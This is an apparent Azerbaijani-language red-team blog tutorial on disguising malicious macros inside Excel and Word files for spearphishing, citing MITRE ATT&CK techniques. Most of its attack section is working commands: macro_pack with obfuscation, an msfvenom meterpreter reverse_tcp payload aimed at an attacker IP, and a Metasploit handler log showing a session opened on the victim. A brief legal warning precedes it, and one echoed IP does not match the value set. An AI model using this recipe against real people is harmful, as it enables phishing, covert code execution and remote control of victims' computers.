alixan
Bu yazıda masquerading haqqında yazacağam. Masquerading dedikdə,zərər verici faylları düşüncəyə uyğun fayllarda saxlamaqdır. Beləliklə qurbanımız bundan şüphələnməyəcək və faylı açacaqdır. Masquerading RED TEAM üçün önəmli bir düşüncədir.
https://attack.mitre.org/techniques/T1036/
Misal üçün, bir bank şirkətində işlədiyimizi düşünək, sonra idarəçilərdən birinə bənzəyən bir mail alırıq və maildə “Bu hesabata təcili baxmalısan deyə bir mesaj görürük”
Bir çox insan bu fayllara baxar və heç bir şeydən süpələnməz cünki, bu sadəcə bir “excel” faylıdır.
Bir çox insan zərərli kodun sadəcə exe fayllarda ola bildiyini düşünür, ancaq Office fayllarında da zərərli kodların olduğunu unudurlar.
Macrolar təməldə VB ilə yazılmış WORD,EXCEL kimi bir Office programında gizlənə bilən kodudur və daha sonra birisi EXCEL faylını açanda VB kodları işə düşür.
Bu bizə həm istismar həmdə ayrıcalıq artırmaq üçün də işlədə bilərik
Bir hesabdan digər hesablara zərərli faylları göndərə bilərik
Həm də MITRE ATT&CK > Execution > User Execution | T1204 > Malicious File | T1204.002 > Command and Scripting Interpreter | T1059
MITRE ATT&CK > Initial Acces > Phishing | T1566 > Spearphishing Attachment | T1566.001
Bu yazının dəvamını oxumadan əvvəl bu hücumun hərhansı birinin icazəsi olmadan həyata keçirilməsi qanunsuzdur. Bir cinayətdir! Bu səbəbdən müştərinin belə hüçumu həyata keçirilməsinə uyğun olub-olmadığına əmin olmaq lazımdır.Hər şeyin resmi olduğuna diqqət edin.
ATTACK EXPLANATİON ~ Bir real olaraq cədvələ bənzəyən qanuni bir EXCEL faylı yaradaçağıq.
ATTACKER > Qanuni Fayl(Bir EXCEL faylı yaradaçağıq sonra isə qurbanın çalıştırmasını istədiyimiz zərərli bir payload yaradırıq).
Mən burda reverse shell payload istifadə edəcəyəm və bu pis niyyətli faylı qurban çalışdırdığında attack pc-yə geri əlaqə edəcək və mənə shell accesi verəcək.
Daha sonra hər iki faylı bir faylda birləşdirmək üçün macro pack istifadə edəcəyəm və bu,son faylın tam olaraq bir EXCEL tablosu kimi görünməsini edəcək.Qurban onu çalışdırdığında, payload işə düşəcək.Qurbana bir mail araçığıyla Phishing edərək zərərli faylı göndərcəyik.Qurban faylı açıb, fayldakı macroları çalışdırdığında attack pc-yə bir reverse shell əldə edəcəyik bu isə qurban pc-də tam icazələrimiz olduğunu demək olar.
İndi isə bir office faylına bir kod yerləşdirək. Bunun üçün bu kodu istifadə edəcəyəm.
echo “calc.exe” | macro_pack.exe -t CMD -o -G “calc.xls”-G, — generate=OUTPUT_FILE_PATH-t, — template=TEMPLATE_NAME-o, — obfuscate Obfuscate code
Paylodı yaratmaq üçün MSFVENOM toolunu istifadə edəcəyəm. Windows 64-bit Reverse shell istifadə edəcəyəm.
-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.60 -f vba | macro_pack.exe -o -G “report.doc”
Artıq zərərli fayl əlimizdə olduğuna görə bir metasploit dinləyicisi qurmaq lazımdır.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.100.60
lhost => 192.168.100.65
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.100.60:4444
[*] Sending stage (200262 bytes) to 192.168.100.10
[*] Meterpreter session 1 opened (192.168.100.60:4444 -> 192.168.100.10:35162 ) at 2022–01–29 16:17:38 -0500
